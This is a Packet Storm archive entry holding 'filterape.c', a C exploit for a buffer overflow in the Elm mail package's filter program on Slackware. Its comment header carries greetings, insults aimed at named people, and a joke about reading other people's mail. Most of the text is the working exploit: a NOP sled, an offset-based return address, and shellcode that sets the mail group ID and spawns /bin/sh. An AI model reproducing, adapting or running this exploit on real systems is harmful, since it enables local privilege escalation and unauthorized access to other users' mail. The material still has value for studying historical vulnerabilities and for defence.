filterape.c exploits a new elm buffer overflow to get EGID mail on Slackware.
0283514040bf44953fc6a6a2b5828645f76e0fbbd4376d98586c0470084c52fc/*
Lo and behold, yet another "grab EGID mail on a Slack exploit"
Almost a complete waste of valuable CPU time to execute...
What is more questionable is who is maintaining the Elm package
at this time, since this isn't just the second overflow I have
seen in it and it probably won't be the last...
Hope you all have a good time trying to read other people's mail
(not that you can being EGID mail on most Slackware boxes, but hey :)
Use as: filterape [offset] [EGID mail]
Now you get nothing - use ^D to grab shell
Cheers,
Scrippie - #phreak.nl
- buffer0verfl0w Security
Do not contact me at: ronald@grafix.nl
Love to: Maja, Hester
Shouts to (in random order): RFP, ADM, HNN, buffer0verfl0w security,
Wiretrip, #phreak.nl, #hit2000, gov-boi, TESO, lcamtuf, HWA,
Yarvje (your NT coding skills rock), robje, ^MACE^,
and everyone who doesn't want to be included here
May a place be reserved in the fiery bowels of Hell for:
[tri] - (of course no-one can hack your box when you firewall it dead,
you should wonder if there is a bit of functionality left...)
Gerrie - Proud holder of the ScriptKiddie of the year award for the past
15 years
JP - That's a bit of a cliche :(
*/
#include <stdio.h>
#define EIP_OFF 517 /* EIP at 517 518 519 520 */
#define NOP 0x90 /* Hacker tool number one ;) */
#define MAILGID 12
char shellcode[]=
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76"
"\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68";
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
char foobar[1000]; /* Too lazy to malloc() */
char gid=MAILGID;
char *mailGid;
int i, offset=5400; /* What a bizarre offset :) */
long RTFM; /* Phrack 49 in this case */
if(argc > 1) offset = atoi(argv[1]);
if(argc > 2) {
gid = (char) atoi(argv[2]);
mailGid = (char *)strchr(shellcode, 0x0c);
*mailGid = gid;
}
for(i=0;i<EIP_OFF - 3;i++) {
foobar[i] = NOP;
}
RTFM = get_sp() - offset;
foobar[i++] = 0xeb; /* Short jmp over ret addy */
foobar[i++] = 0x04;
foobar[i++] = RTFM & 0xff;
foobar[i++] = (RTFM >> 8) & 0xff;
foobar[i++] = (RTFM >> 16) & 0xff;
foobar[i++] = (RTFM >> 24) & 0xff;
foobar[i++] = 0x00;
strcat(foobar, shellcode);
execl("/usr/bin/filter", "I'm a scriptkiddie and I'm okay...", "-f", foobar,
NULL);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed